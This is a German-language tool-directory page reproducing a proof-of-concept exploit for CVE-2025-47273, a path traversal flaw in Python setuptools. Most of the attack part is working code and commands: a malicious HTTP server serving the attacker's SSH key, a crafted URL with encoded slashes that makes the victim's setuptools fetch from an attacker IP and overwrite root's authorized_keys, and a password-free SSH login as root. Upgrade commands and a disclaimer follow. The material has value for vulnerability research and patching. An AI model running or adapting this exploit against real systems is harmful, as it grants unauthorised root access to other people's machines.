Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/alielkhatteb/cve-2025-47273-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLieferkettensicherheitLernen & Bildung
GitHubalielkhatteb/cve-2025-47273-poc

CVE-2025-47273-POC

CVE-2025-47273 — setuptools-Pfadumgehungs-PoC

Repository anzeigen
11vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

setuptools Pfad-Traversal CVE-2025-47273

📖 Übersicht

Proof-of-Concept-Exploit für eine Pfad-Traversal-Schwachstelle in Python setuptools < 78.1.1.

Durch Missbrauch der _download_url-Funktion der PackageIndex-Komponente kann ein Angreifer beliebige Dateien an beliebige Stellen im Dateisystem schreiben – mit den Berechtigungen des Prozesses, der setuptools ausführt.


🎯 Schwachstellenübersicht

FeldDetail
🎯 ZielPython setuptools < 78.1.1
🐛 FehlerklassePfad-Traversal (CWE-22)
💥 AuswirkungBeliebiges Dateischreiben
📍 AngriffsvektorBösartige Paketindex-URL
🔍 Grundursacheos.path.join() verwirft tmpdir, wenn das zweite Argument mit / beginnt

📋 Voraussetzungen

  • Python 3 auf beiden Maschinen
  • SSH-Schlüsselpaar bereits auf dem Angreifer generiert (~/.ssh/id_rsa + id_rsa.pub)
  • Zielskript ruft setuptools PackageIndex mit einer benutzergesteuerten URL auf

🚀 Verwendung

🔧 Schritt 1 — SSH-öffentlichen Schlüssel vorbereiten (Angreifermaschine)

root@kitploit:~
# Copy your public key to the current directory to serve it
cp ~/.ssh/id_rsa.pub authorized_keys

📡 Schritt 2 — Bösartigen HTTP-Server starten (Angreifermaschine)

Dieser Server antwortet auf jede GET-Anfrage mit Ihrem öffentlichen Schlüssel – unabhängig vom Pfad. setuptools wird den Pfad /USER/.ssh/authorized_keys anfordern, aber Ihren Schlüsselinhalt erhalten.

root@kitploit:~
cat > python_server.py << 'EOF'
import http.server
import socketserver

class Handler(http.server.SimpleHTTPRequestHandler):
    def do_GET(self):
        # Serve authorized_keys regardless of path requested
        self.send_response(200)
        self.end_headers()
        with open("authorized_keys", "rb") as f:
            self.wfile.write(f.read())

with socketserver.TCPServer(("", 80), Handler) as httpd:
    httpd.serve_forever()
EOF

python3 python_server.py

💥 Schritt 3 — Pfad-Traversal auslösen (Opfermaschine)

root@kitploit:~
ATTACKER_IP="192.168.1.20"
TARGET_USER="root"

sudo python3 /path/to/vulnerable_script.py \
  "http://${ATTACKER_IP}/%2f${TARGET_USER}%2f.ssh%2fauthorized_keys#egg=evil-1.0"

👾 Schritt 4 — Als root anmelden (Angreifermaschine)

root@kitploit:~
ssh root@VICTIM_IP

Kein Passwort. Direkte Root-Shell. 🔑


🔒 Patch

Version 78.1.1 behebt das Problem.

PaketmanagerBefehl
🐍 pippip install --upgrade setuptools
🐧 Debian/Ubuntusudo apt upgrade python3-setuptools
🎩 RHEL/Fedorasudo dnf upgrade python3-setuptools
🏗️ Manuellsetuptools releases

📎 Referenzen

  • 🔗 NVD — CVE-2025-47273

  • 🔗 GitHub Advisory — GHSA-5rjg-fvgr-3xxf

  • 🔗 setuptools Fix Commit

  • 🔗 setuptools poc


⚖️ Haftungsausschluss und Bedingungen

Dieser Proof-of-Concept-Code (PoC) wird ausschließlich zu Bildungs- und autorisierten Penetrationstestzwecken bereitgestellt.

  • Es wird keine Erlaubnis erteilt, diesen Code für andere Zwecke zu ändern, weiterzuverbreiten oder zu verwenden.
  • Nicht autorisierte Nutzung oder Änderung kann illegal und unethisch sein.
  • Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden.
Tool herunterladen